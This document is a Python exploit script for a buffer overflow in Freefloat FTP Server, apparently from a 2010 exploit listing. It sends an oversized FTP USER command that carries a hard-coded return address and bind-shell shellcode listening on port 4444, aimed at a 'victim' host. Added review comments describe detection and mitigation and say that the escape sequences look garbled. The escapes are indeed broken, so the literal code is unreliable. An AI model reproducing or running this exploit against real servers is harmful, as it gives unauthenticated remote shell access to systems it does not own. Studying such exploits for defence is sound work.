
# Title : Freefloat FTP Server Buffer Overflow Vulnerability 0day
# Published : 2010-12-05
# Author : 0v3r


# Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability
# Date: 12/05/2010
# Author: 0v3r
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

import socket
import sys

def usage():
        """Print the expected command line (target IP and port) and an example.

        Uses Python 2 print statements. It only prints; the caller decides
        whether to exit.
        """

        print "usage  : ./freefloatftp.py <victim_ip>  <victim_port>"
        print "example: ./freefloatftp.py 192.168.1.100 21"

# Payload blob. The author labels it as bind-shell shellcode listening on
# TCP port 4444; nothing else in this file describes its contents.
# NOTE(review): the string escapes in this listing look altered by page
# extraction, so treat the literal as illustrative rather than byte-accurate.
# Defender's view: a new listener on TCP 4444 on a host that should only
# serve FTP is a post-compromise indicator. Inbound filtering that exposes
# only the FTP port keeps such a listener unreachable from outside.
shellcode = ("x31xc9xdbxcdxbbxb3x93x96x9dxb1x56xd9x74x24xf4"
"x5ax31x5ax17x83xeaxfcx03x5ax13x51x66x6ax75x1c"
"x89x93x86x7ex03x76xb7xacx77xf2xeax60xf3x56x07"
"x0bx51x43x9cx79x7ex64x15x37x58x4bxa6xf6x64x07"
"x64x99x18x5axb9x79x20x95xccx78x65xc8x3fx28x3e"
"x86x92xdcx4bxdax2exddx9bx50x0exa5x9exa7xfbx1f"
"xa0xf7x54x14xeaxefxdfx72xcbx0ex33x61x37x58x38"
"x51xc3x5bxe8xa8x2cx6axd4x66x13x42xd9x77x53x65"
"x02x02xafx95xbfx14x74xe7x1bx91x69x4fxefx01x4a"
"x71x3cxd7x19x7dx89x9cx46x62x0cx71xfdx9ex85x74"
"xd2x16xddx52xf6x73x85xfbxafxd9x68x04xafx86xd5"
"xa0xbbx25x01xd2xe1x21xe6xe8x19xb2x60x7bx69x80"
"x2fxd7xe5xa8xb8xf1xf2xcfx92x45x6cx2ex1dxb5xa4"
"xf5x49xe5xdexdcxf1x6ex1fxe0x27x20x4fx4ex98x80"
"x3fx2ex48x68x2axa1xb7x88x55x6bxcex8fx9bx4fx82"
"x67xdex6fx34x2bx57x89x5cxc3x31x01xc9x21x66x9a"
"x6ex5ax4cxb6x27xccxd8xd0xf0xf3xd8xf6x52x58x70"
"x91x20xb2x45x80x36x9fxedxcbx0ex77x67xa2xddxe6"
"x78xefxb6x8bxebx74x47xc2x17x23x10x83xe6x3axf4"
"x39x50x95xebxc0x04xdexa8x1exf5xe1x31xd3x41xc6"
"x21x2dx49x42x16xe1x1cx1cxc0x47xf7xeexbax11xa4"
"xb8x2axe4x86x7ax2dxe9xc2x0cxd1x5bxbbx48xedx53"
"x2bx5dx96x8excbxa2x4dx0bxfbxe8xccx3dx94xb4x84"
"x7cxf9x46x73x42x04xc5x76x3axf3xd5xf2x3fxbfx51"
"xeex4dxd0x37x10xe2xd1x1dx1a")


# Layout of the oversized argument, in order: filler, the value the author
# labels "eip", a short run labelled "nops", the payload, then trailing
# filler sized so the whole argument comes to 1000 characters.
# NOTE(review): string escapes in this listing look altered by page
# extraction; the lengths below are as the author intended them, not
# necessarily as this rendering would evaluate.

# Filler placed ahead of the "eip" value (the author repeats it 230 times).
junk1  = "x41" * 230
# Hard-coded address from the author's own annotation. Presumably it is only
# valid on the platform named in the header (Windows XP SP3 EN); a fixed
# address like this is what address-space randomization is designed to break.
eip    = "x53x93x42x7E"  #7E429353 JMP ESP
# Padding placed between the "eip" value and the payload.
nops   = "x90" * 16
# Trailing filler: pads the total out to 1000.
junk2  = "x43" * (1000 - len(junk1 + eip + nops + shellcode))

# Final argument. At 1000 characters it is far longer than any legitimate
# FTP user name, which makes argument length a usable detection criterion.
buff   = junk1 + eip + nops + shellcode + junk2 

# Script body: parse the two command-line arguments, open one TCP connection
# and send a single FTP USER command carrying the oversized argument.
# The socket is created before argument validation.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


# Banner (Python 2 print statements).
print "n"	
print "----------------------------------------------------------------"
print "|      Freefloat FTP Server Buffer Overflow Vulnerability      |"
print "----------------------------------------------------------------"
print "n"


# Exactly two arguments are required (IP and port); otherwise show usage and exit.
if len(sys.argv) != 3:
	usage()
        sys.exit()

ip   = sys.argv[1]
port = sys.argv[2]

try:
	print("[-] Connecting to " + ip + " on port " + port + "n")
	s.connect((ip,int(port)))
	# Read up to 1024 bytes of the server greeting; the value is never inspected.
	data = s.recv(1024)
	print("[-] Sending exploit...")
	# USER is the first and only command sent, so the vulnerable code path is
	# reached before any authentication. Defender's view: anything that can
	# reach the FTP port can trigger it, so limit network exposure of the
	# service. An IDS or proxy rule that rejects over-long USER arguments
	# covers this request. The header lists no CVE; check for a fixed build,
	# otherwise replace the server.
	s.send('USER ' + buff + 'rn')
	s.close()
	# This message only means send() returned without raising; the script
	# never checks how the server reacted.
	print("[-] Exploit successfully sent...")
	print("[-] Connect to " + ip + " on port 4444")
# Bare except: every failure in the try block (including a non-numeric port
# passed to int()) is reported as a connection error.
except:
	print("[-] Connection error...")
	print("[-] Check if victim is up.")